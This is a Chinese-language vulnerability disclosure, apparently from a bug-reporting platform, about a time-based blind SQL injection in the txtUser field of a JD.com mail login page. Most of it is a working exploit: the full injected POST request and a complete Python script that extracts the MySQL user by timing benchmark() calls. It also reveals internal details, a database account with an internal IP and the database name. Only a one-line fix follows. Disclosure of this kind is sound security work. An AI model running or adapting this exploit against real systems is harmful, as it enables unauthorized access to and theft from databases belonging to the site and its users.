京东商城某重要系统MySQL注射(附验证脚本)

京东商城某重要系统MySQL注射(附验证脚本)

详细说明：

注射点：

code 区域

POST https://mail.jd.com/Erpout/Logon.aspx 
captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5

参数txtUser可注入，MySQL time blind。benchmark(15000000,md5(1)),响应时间大于2.0s。

漏洞证明：

猜解MySQL user(),得到：

code 区域

[Done]MySQL user is jdmail_rw@172.17.27.41

code 区域

database():   jdmail

python验证脚本：

code 区域

#encoding=gbk

import httplib

import time

import string

import sys

import random

import urllib

headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'ValiCode=PDC9BIL5P735'}

payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

print 'start to retrive MySQL user:'

user = ''

for i in range(1, 23):

for payload in payloads:

conn = httplib.HTTPSConnection('mail.jd.com', timeout=30)

s = "captcha=test&destination=https://mail.jd.com/owa/&" \

"flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \

"&trusted=4&txtPassword=test&" \

"txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \

"&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \

"&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5"

conn.request(method='POST',

url="/Erpout/Logon.aspx",

body=s,

headers = headers)

start_time = time.time()

html_doc = conn.getresponse().read()

conn.close()

if time.time() - start_time > 2.0:

user += payload

print '\n[In progress] %s' % user

break

else:

print '.',

print '\n[Done]MySQL user is', user

修复方案：

参数转义，过滤